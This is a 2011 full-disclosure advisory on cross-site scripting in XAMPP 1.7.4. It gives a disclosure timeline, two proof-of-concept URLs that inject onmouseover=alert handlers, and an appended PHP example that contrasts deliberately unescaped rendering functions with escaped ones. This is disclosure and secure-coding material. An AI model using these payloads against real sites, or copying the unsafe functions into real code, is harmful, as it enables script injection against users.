
List:       full-disclosure
Subject:    [Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
From:       sangte amtham <sangteamtham () gmail ! com>
Date:       2011-10-27 18:45:20
Message-ID: CADO=9dJKk70h2M5Zxp4OjWrqPXrABXtGi2xrmk3XN=_ccpx90A () mail ! gmail ! com

Please download the attachment

["xampp.txt" (text/plain)]

$-------------------------------------------------------------------------------------------------------------------
$ Xampp 1.7.4 for Windows Multiple Cross-Site Scripting Vulnerabilities
$ Author : Sangteamtham 
$ Home : Hcegroup.net 
$ Download : http://www.apachefriends.org/en/xampp-windows.html
$ Date :07/12/2011 
$ Twitter: http://twitter.com/Sangte_amtham
$****************************************************************************************** 
1.Description:

 XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.
 
2. Patch:

 Jul 12, 2011: Contacted the vendor.
 Jul 12, 2011: Vendor said that they would fix it in the next release.
 Sep 21, 2011: XAMPP 1.7.7 released.
 Oct 27, 2011: Released the bug.

3. POC:

http://localhost/xampp/ming.php?text=%22%20onmouseover%3dalert%28%22XSS%22%29%20bad%22

http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E

In adodb.php, we have a form to submit database information, but this form is not filtered well, so we can submit malicious code.

http://localhost/xampp/adodb.php


$****************************************************************************************** 
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security 
$ 
$ 
$--------------------------------------------------------------------------------------------------------------------
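
The two PoC URLs above break out of a double-quoted and a single-quoted HTML attribute respectively. The PHP below is an added example, not XAMPP's source and not the advisory author's code: the function names are hypothetical, and it assumes the pages echo the `text` parameter and `PHP_SELF` into attributes, showing that unescaped pattern beside the encoded one.

```php
<?php
// Added example: hypothetical handlers, not XAMPP's own source.

// Escape for HTML text and quoted-attribute contexts. ENT_QUOTES covers both
// " and ', the two delimiters the PoC URLs break out of.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: request data copied straight into a double-quoted attribute.
function render_text_field_unsafe(string $text): string
{
    return '<input type="text" name="text" value="' . $text . '">';
}

// After: same markup, value encoded for the attribute context.
function render_text_field(string $text): string
{
    return '<input type="text" name="text" value="' . attr($text) . '">';
}

// Before: PHP_SELF includes request-controlled PATH_INFO (/cds.php/<anything>).
function render_form_open_unsafe(array $server): string
{
    return "<form method='post' action='" . $server['PHP_SELF'] . "'>";
}

// After: SCRIPT_NAME excludes PATH_INFO; it is still encoded on output.
function render_form_open(array $server): string
{
    return "<form method='post' action='" . attr($server['SCRIPT_NAME']) . "'>";
}

// Constructed inputs equal to the URL-decoded PoC values from the advisory.
$text   = '" onmouseover=alert("XSS") bad"';
$server = [
    'SCRIPT_NAME' => '/xampp/cds.php',
    'PHP_SELF'    => '/xampp/cds.php/\'onmouseover=alert("XSS")>',
];

echo render_text_field_unsafe($text), "\n";   // value attribute is closed early
echo render_text_field($text), "\n";          // quotes are emitted as &quot;
echo render_form_open_unsafe($server), "\n";  // action attribute is closed early
echo render_form_open($server), "\n";         // PATH_INFO never reaches the output
```

Run with `php` on the command line and compare each unsafe line with the encoded line that follows it.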



